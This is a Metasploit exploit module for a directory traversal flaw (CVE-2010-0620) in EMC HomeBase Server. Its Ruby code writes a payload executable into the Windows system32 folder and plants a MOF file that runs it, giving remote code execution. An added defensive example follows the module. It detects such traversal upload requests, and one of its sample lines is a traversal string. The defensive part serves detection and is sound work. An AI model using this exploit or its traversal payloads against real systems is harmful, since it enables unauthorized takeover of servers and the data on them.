EMC HomeBase Server Directory Traversal Remote Code Execution
Source: http://www.metasploit.com Author: MC Published: 2011-04-29

##
# $Id: emc_homebase_exec.rb 12458 2011-04-27 20:29:27Z mc $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = GreatRanking

 include Msf::Exploit::Remote::Tcp
 include Msf::Exploit::EXE
 include Msf::Exploit::WbemExec

 def initialize(info = {})
  super(update_info(info,
   'Name'           => 'EMC HomeBase Server Directory Traversal Remote Code Execution',
   'Description'    => %q{
     This module exploits a directory traversal and remote code execution
    flaw in EMC HomeBase Server 6.3.0.

    Note: This module has only been tested against Windows XP SP3 and Windows 2003 SP2
   },
   'Author'         => [ 'MC' ],
   'License'        => MSF_LICENSE,
   'Version'        => '$Revision: 12458 $',
   'References'     =>
    [
     [ 'CVE', '2010-0620' ],
     [ 'BID', '38380' ],
     [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-020/' ],
    ],
   'Privileged'     => true,
   'DefaultOptions' =>
    {
     'EXITFUNC' => 'process',
     'InitialAutoRunScript' => 'migrate -f',
    },
   'Payload'        =>
    {
     'Space'    => 2048,
     'DisableNops' => true,
     'StackAdjustment' => -3500,
    },
   'Platform'       => 'win',
   'Targets'        =>
    [
     [ 'Automatic',  { } ],
    ],
   'DefaultTarget' => 0,
   'DisclosureDate' => 'Feb 23 2010'))

  register_options(
   [
    Opt::RPORT(18821),
    OptBool.new('SSL', [true, 'Use SSL', true]),
   ], self.class)
 end

 def exploit

  name = exe_name()
  exe_upload(name)
  select(nil,nil,nil,2)
  mof_upload(name)
  select(nil,nil,nil,4)
  handler

 end

 def exe_name

  rand_text_alpha_upper(8) + ".exe"

 end

 def exe_upload(exe_name)

  # this uploads our final exe payload.

  data = generate_payload_exe
  exe_dir = "/..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\WINDOWS\\\\system32\\\\"
 
  connect

  banner = sock.get
   if ( banner =~ /EMC HomeBase HomebaseSSL Service/ )
    print_good("EMC HomeBase HomebaseSSL Service Detected!")
    print_status("Sending exe payload '#{exe_name}'...")
    sock.put("DATA #{exe_dir}#{exe_name} #{data.length}\r\n")
    ready = sock.get
     if ( ready =~ /150 Ready to Recieve Data/ )
      print_good("#{ready.strip}")
      print_status("Sending '#{data.length}' bytes of data...")
      sock.put(data)
      complete = sock.get
      if ( complete =~ /226 Data Complete/ )
       print_good("#{complete.strip}")
       print_status("Sending 'QUIT'...")
       sock.put("quit\r\n")
       return
      end
     else
      print_error("Something went wrong...")
      return
     end
   else
    print_error("Not an EMC HomeBaseSSL Service")
    return
   end
  
  disconnect

 end

 def mof_upload(exe_name)

  # this is what runs our uploaded exe payload.

  mof_name = rand_text_alphanumeric(8+rand(8))
  mof      = generate_mof(mof_name, exe_name)
  mof_dir  = "/..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\WINDOWS\\\\system32\\\\wbem\\\\mof\\\\"

  connect

  banner = sock.get
   if ( banner =~ /EMC HomeBase HomebaseSSL Service/ )
    print_good("EMC HomeBase HomebaseSSL Service Detected!")
    print_status("Sending MOF file '#{mof_name}'...")
    sock.put("DATA #{mof_dir}#{mof_name} #{mof.length}\r\n")
    ready = sock.get
     if ( ready =~ /150 Ready to Recieve Data/ )
      print_good("#{ready.strip}")
      print_status("Sending '#{mof.length}' bytes of data...")
      sock.put(mof)
      complete = sock.get
       if ( complete =~ /226 Data Complete/ )
        print_good("#{complete.strip}")
        print_status("Sending 'QUIT'...")
        sock.put("quit\r\n")
        return
       end
     else
      print_error("Something went wrong...")
      return
     end
   else
    print_error("Not an EMC HomeBaseSSL Service")
    return
   end

  disconnect

 end
end
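
Server-side view of the upload request the module relies on, as an added example that is not part of the Metasploit module or of EMC's code: it resolves the path in a "DATA <path> <length>" line the way Windows would and rejects anything that climbs out of the upload root or lands in the two directories the module writes to. The function names, reason tags and sample lines are assumptions made for illustration.

```ruby
# Added defensive example; not part of the Metasploit module above.
# Assumption: upload requests have the form "DATA <path> <length>\r\n",
# as sent by the module. Function and reason names are hypothetical.

# Resolve a client-supplied path the way Windows would: "/" and "\" both
# separate segments, repeated separators collapse, ".." climbs one level.
# Returns [segments, escaped]; escaped is true if ".." climbed past the root.
def resolve_segments(path)
  stack = []
  escaped = false
  path.split(%r{[\\/]+}).each do |seg|
    next if seg.empty? || seg == '.'
    if seg != '..'
      stack << seg
    elsif stack.empty?
      escaped = true
    else
      stack.pop
    end
  end
  [stack, escaped]
end

# Classify one command line; returns a hash with :verdict and :reasons.
def inspect_data_command(line)
  m = /\ADATA (.+) (\d+)\r?\n?\z/.match(line)
  return { verdict: :not_data, reasons: [] } unless m

  segs, escaped = resolve_segments(m[1])
  resolved = segs.join('/')
  reasons = []
  reasons << :escapes_root if escaped
  reasons << :absolute_path if m[1] =~ /\A[a-z]:/i
  reasons << :targets_system32 if resolved =~ %r{(\A|/)windows/system32(/|\z)}i
  reasons << :targets_wbem_mof if resolved =~ %r{/wbem/mof(/|\z)}i
  { verdict: reasons.empty? ? :allow : :reject, reasons: reasons,
    resolved: resolved, length: m[2].to_i }
end

# Constructed sample lines (not captured traffic).
SAMPLES = [
  "DATA reports/q1.dat 2048\r\n",
  "DATA reports/../q1.dat 2048\r\n",
  "DATA /..\\\\..\\\\WINDOWS\\\\system32\\\\wbem\\\\mof\\\\sample 120\r\n",
  "QUIT\r\n"
].freeze

SAMPLES.each { |l| puts "#{l.strip.inspect} => #{inspect_data_command(l)}" }
```

Resolving segments before deciding matters: a plain substring match on ".." would reject the harmless second sample, while the third is caught because its ".." segments climb past an empty stack.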


 